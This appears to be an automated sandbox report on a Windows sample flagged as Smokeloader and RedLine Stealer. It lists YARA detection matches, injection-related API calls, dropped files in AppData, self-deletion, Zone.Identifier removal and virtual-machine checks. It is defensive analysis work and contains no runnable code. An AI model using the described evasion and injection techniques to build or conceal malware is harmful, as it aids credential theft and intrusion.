Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00403103 RtlCreateUserThread,NtTerminateProcess,	6_2_00403103
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004014FB
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401641
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00403257 RtlCreateUserThread,NtTerminateProcess,	6_2_00403257
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401606
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401613
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401627
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015FB
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00403103 RtlCreateUserThread,NtTerminateProcess,	8_2_00403103
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004014FB
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401641
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00403257 RtlCreateUserThread,NtTerminateProcess,	8_2_00403257
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401606
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401613
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401627
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00403433 GetKeyboardLayoutList,OpenProcessToken,GetTokenInformation,NtEnumerateKey,	8_2_00403433
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015FB

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415B60	0_2_00415B60
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_00415B60	5_2_00415B60
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00415840	6_2_00415840
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00415840	8_2_00415840

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 565.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fgbwcit.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: trbwcit.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@22/3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02DBAE2E CreateToolhelp32Snapshot,Module32First,

0_2_02DBAE2E

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\trbwcit

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\565.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	ReversingLabs: Detection: 36%
Source: file.exe	Virustotal: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\trbwcit C:\Users\user\AppData\Roaming\trbwcit
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\565.exe C:\Users\user\AppData\Local\Temp\565.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fgbwcit C:\Users\user\AppData\Roaming\fgbwcit
Source: unknown	Process created: C:\Users\user\AppData\Roaming\trbwcit C:\Users\user\AppData\Roaming\trbwcit
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fgbwcit C:\Users\user\AppData\Roaming\fgbwcit
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\565.exe C:\Users\user\AppData\Local\Temp\565.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.vugud:W;.fay:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\trbwcit	Unpacked PE file: 5.2.trbwcit.400000.0.unpack .text:ER;.rdata:R;.data:W;.vugud:W;.fay:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\565.exe	Unpacked PE file: 6.2.565.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.puneki:W;.fok:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\fgbwcit	Unpacked PE file: 8.2.fgbwcit.400000.0.unpack .text:ER;.rdata:R;.data:W;.puneki:W;.fok:W;.rsrc:R; vs .text:EW;

Source: file.exe	Static PE information: section name: .vugud
Source: file.exe	Static PE information: section name: .fay
Source: 565.exe.1.dr	Static PE information: section name: .puneki
Source: 565.exe.1.dr	Static PE information: section name: .fok
Source: fgbwcit.1.dr	Static PE information: section name: .puneki
Source: fgbwcit.1.dr	Static PE information: section name: .fok
Source: trbwcit.1.dr	Static PE information: section name: .vugud
Source: trbwcit.1.dr	Static PE information: section name: .fay

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02D81540 pushad ; ret	0_2_02D81550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DBE887 push esp; ret	0_2_02DBE889
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DBCC2A push B63524ADh; retn 001Fh	0_2_02DBCC61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DBD727 pushfd ; iretd	0_2_02DBD728
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_02CC1540 pushad ; ret	5_2_02CC1550
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_02D5DF6F push esp; ret	5_2_02D5DF71
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_02D5C312 push B63524ADh; retn 001Fh	5_2_02D5C349
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_02D5CE0F pushfd ; iretd	5_2_02D5CE10
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00402842 pushad ; retf F6A4h	6_2_004029D1
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00401065 pushfd ; retf	6_2_0040106A
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00402805 push 21CACAEFh; iretd	6_2_0040280A
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00402511 push ebp; iretd	6_2_00402523
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00403325 push eax; ret	6_2_004033F3
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00403433 pushad ; ret	6_2_004035AB
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00401182 push esp; retf	6_2_0040118E
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_00402A9D pushad ; retf	6_2_00402AAB
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_004012B7 push cs; iretd	6_2_004012B8
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02BF11E9 push esp; retf	6_2_02BF11F5
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02BF10CC pushfd ; retf	6_2_02BF10D1
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02BF131E push cs; iretd	6_2_02BF131F
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02BF2B04 pushad ; retf	6_2_02BF2B12
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02BF2578 push ebp; iretd	6_2_02BF258A
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02BF286C push 21CACAEFh; iretd	6_2_02BF2871
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00402842 pushad ; retf F6A4h	8_2_004029D1
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00401065 pushfd ; retf	8_2_0040106A
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00402805 push 21CACAEFh; iretd	8_2_0040280A
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_00402511 push ebp; iretd	8_2_00402523

Source: file.exe	Static PE information: section name: .text entropy: 7.548546960257042
Source: 565.exe.1.dr	Static PE information: section name: .text entropy: 7.527012054123166
Source: fgbwcit.1.dr	Static PE information: section name: .text entropy: 7.527012054123166
Source: trbwcit.1.dr	Static PE information: section name: .text entropy: 7.548546960257042

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\565.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fgbwcit	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\trbwcit	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fgbwcit			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\trbwcit			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\trbwcit:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\fgbwcit:Zone.Identifier read attributes \| delete			Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
